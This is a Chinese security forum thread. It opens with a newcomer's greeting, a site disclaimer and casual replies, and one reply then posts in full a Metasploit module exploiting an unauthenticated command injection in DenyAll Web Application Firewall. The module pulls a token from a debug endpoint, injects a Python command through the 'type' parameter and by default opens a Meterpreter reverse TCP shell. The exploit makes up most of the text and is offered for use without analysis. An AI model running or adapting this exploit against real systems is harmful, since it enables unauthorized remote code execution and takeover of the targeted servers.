最近看过此主题的会员

返回列表 发帖

新人报到 第一次发帖 求关注

新人报道 啦啦啦 啦啦啦
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:anqixue发表,本帖发表者anqixue符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者anqixue和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。
花若盛开蝴蝶自来,你若精彩天自安排。

欢迎大师姐第一次发言!本人抢到了沙发!

TOP

回复 2# webmaster


    这么多年了 才来论坛 混一混 多关照
花若盛开蝴蝶自来,你若精彩天自安排。

TOP

楼上的富××,,,哈哈,,

TOP

我XXX 好久不来了

TOP

新人回帖,求照顾

TOP

DenyAll WAF 6.3.0以下版本远程代码执行漏洞 (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "DenyAll Web Application Firewall Remote Code Execution",
      'Description'    => %q{
        This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
        terminal command under the context of the web server user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author &amp; msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => true,
          'RPORT' => 3001,
          'Payload'  => 'python/meterpreter/reverse_tcp'
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => "Sep 19 2017",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
      ]
    )
  end

  def get_token
    # Taking token by exploiting bug on first endpoint.
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
      'vars_get' => {
        'applianceUid' => 'LOCALUID',
        'typeOf' => 'debug'
      }
    })

    if res &amp;&amp; res.code == 200 &amp;&amp; res.body.include?("iToken")
      res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
    else
       nil
    end
  end

  def check
    # If we've managed to get token, that means target is most likely vulnerable.
    token = get_token
    if token.nil?
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Appears
    end
  end

  def exploit
    # Get iToken from unauthenticated accessible endpoint
    print_status('Extracting iToken value')
    token = get_token

    if token.nil?
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    else
      print_good("Awesome. iToken value = #{token}")
    end

    # Accessing to the vulnerable second endpoint where we have command injection with valid iToken
    print_status('Trigerring command injection vulnerability with iToken value.')
    r = rand_text_alpha(5 + rand(3));

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
      'vars_post' => {
        'iToken' => token,
        'tag' => 'tunnel',
        'stime' => r,
        'type' => "#{r}$(python -c "#{payload.encoded}")"
        }
    })

  end
end



















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表